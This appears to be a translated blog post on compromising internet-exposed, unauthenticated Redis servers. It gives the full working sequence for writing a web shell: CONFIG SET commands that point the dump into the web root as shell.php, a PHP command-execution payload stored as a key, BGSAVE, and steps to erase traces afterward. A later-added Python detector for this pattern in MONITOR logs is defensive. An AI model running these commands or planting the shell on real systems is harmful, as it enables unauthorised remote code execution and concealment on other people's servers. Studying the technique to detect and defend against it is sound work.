0x00 Preface
Many Redis instances are currently exposed directly to the Internet with no authentication at all; examples are easy to find on Shodan or ZoomEye. Since Redis is an in-memory database, such an instance is bound to hold sensitive data (for example when Redis is used as a session store), so the obvious risk is disclosure of sensitive information. Recently, however, research on Redis from the cloud community and from drops showed people getting a shell through it, which I found more interesting, so I wrote up this summary.
0x01 Redis port detection
Redis listens on port 6379 by default. To confirm that a host is running it, scan with a Python client, or open port 6379 directly in a browser and look at the banner:
0x02 Install a CLI locally
Run redis-cli -h [hostname] -p [port]. For example, if 10.10.10.1 has port 6379 open, connect with redis-cli -h 10.10.10.1 to enter the interactive Redis shell.
0x03 Using Redis to write a shell
Conditions: (1) a web server runs on the Redis host; (2) the web root is known.
Principle: one way Redis persists data is to dump it to an .rdb file whose name is set by the dbfilename option in the configuration file. This dump normally runs on a time-based schedule. However, Redis also has a CONFIG SET command that modifies configuration options at runtime, and redis.conf has a dir option that selects the directory in which dump.rdb is saved (the default is the current directory). By controlling both dir and dbfilename, we can have the dump written into the web root (assume /var/www/html):
CONFIG SET dir /var/www/html       # change the backup directory
CONFIG SET dbfilename shell.php    # change the backup file name to our shell's name
Then create a string value that will be written into the backup file when Redis saves:
SET shell "<?php system($_GET['cmd']); ?>"
To back up the data to disk:
BGSAVE
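As an added example (my own code, not from the original post), the detection side of the sequence above: a small parser for Redis MONITOR output that flags any client which retargets dir or dbfilename via CONFIG SET and then triggers a dump with BGSAVE or SAVE. The sample lines, addresses and timestamps are constructed.

```python
import re
from collections import defaultdict
# One line of Redis MONITOR output looks like:
#   <timestamp> [<db> <client_addr>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>\S+)\] (?P<args>.*)$')

# Options that must be retargeted to drop a dump file somewhere unexpected.
RISKY_OPTIONS = {"dir", "dbfilename"}
# Commands that flush the dataset to the (possibly retargeted) file.
DUMP_COMMANDS = {"BGSAVE", "SAVE"}

def parse_monitor_line(line):
    """Return (client_addr, [args...]) or None if the line is not a command record."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = re.findall(r'"((?:\\.|[^"\\])*)"', m.group("args"))
    return m.group("addr"), args

def detect_rdb_write_abuse(lines):
    """Flag clients that change dir/dbfilename with CONFIG SET and then trigger a dump;
    returns a list of (client_addr, options_changed, dump_command)."""
    changed = defaultdict(dict)   # client_addr -> {option: new value}
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed:
            continue
        addr, args = parsed
        if len(args) >= 4 and args[0].upper() == "CONFIG" and args[1].upper() == "SET":
            opt = args[2].lower()
            if opt in RISKY_OPTIONS:
                changed[addr][opt] = args[3]
        elif args and args[0].upper() in DUMP_COMMANDS and changed.get(addr):
            alerts.append((addr, dict(changed[addr]), args[0].upper()))
            changed.pop(addr)   # report each retarget-then-dump sequence once
    return alerts

# Constructed sample in MONITOR format: one suspicious client and one benign client.
SAMPLE_LINES = [
    '1700000000.100000 [0 10.0.0.5:51234] "CONFIG" "SET" "dir" "/var/www/html"',
    '1700000000.200000 [0 10.0.0.5:51234] "CONFIG" "SET" "dbfilename" "shell.php"',
    '1700000000.300000 [0 10.0.0.5:51234] "SET" "shell" "<placeholder>"',
    '1700000000.400000 [0 10.0.0.5:51234] "BGSAVE"',
    '1700000000.500000 [0 10.0.0.9:40000] "SET" "session:abc" "user=1"',
    '1700000000.600000 [0 10.0.0.9:40000] "BGSAVE"',
]
if __name__ == "__main__":
    for addr, opts, cmd in detect_rdb_write_abuse(SAMPLE_LINES):
        print(f"ALERT {addr}: {cmd} after CONFIG SET {opts}")
```

The benign client's BGSAVE is not reported because it never touched dir or dbfilename; in production the same logic can be fed from a MONITOR stream or from a proxy log.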
0x04 Clear traces
(1) Delete the key. (2) Before changing dir and dbfilename, it is best to run CONFIG GET to record their original values so they can be restored afterwards.
DEL shell
CONFIG SET dir /usr/local/redis
CONFIG SET dbfilename dump.rdb
0x05 Test
Access the shell:
0x06 Problems
(1) Someone on drops said the backup file is created with default permissions of 0600, but when I ran Redis locally as root there was no permission problem and the write succeeded.
(2) In general, a Redis backup writes all of the existing data out in full, so the persistence file is likely to be very large; whether Apache can even read it becomes a question, and a file that is too big may block the server outright. One workaround is to back up all the data first, then FLUSHALL, then run the backup that exports the shell, and finally restore from the first persistence file. This may cause some data loss and damage the site, so it is not recommended.
A summary of Getshell problems in Redis infiltration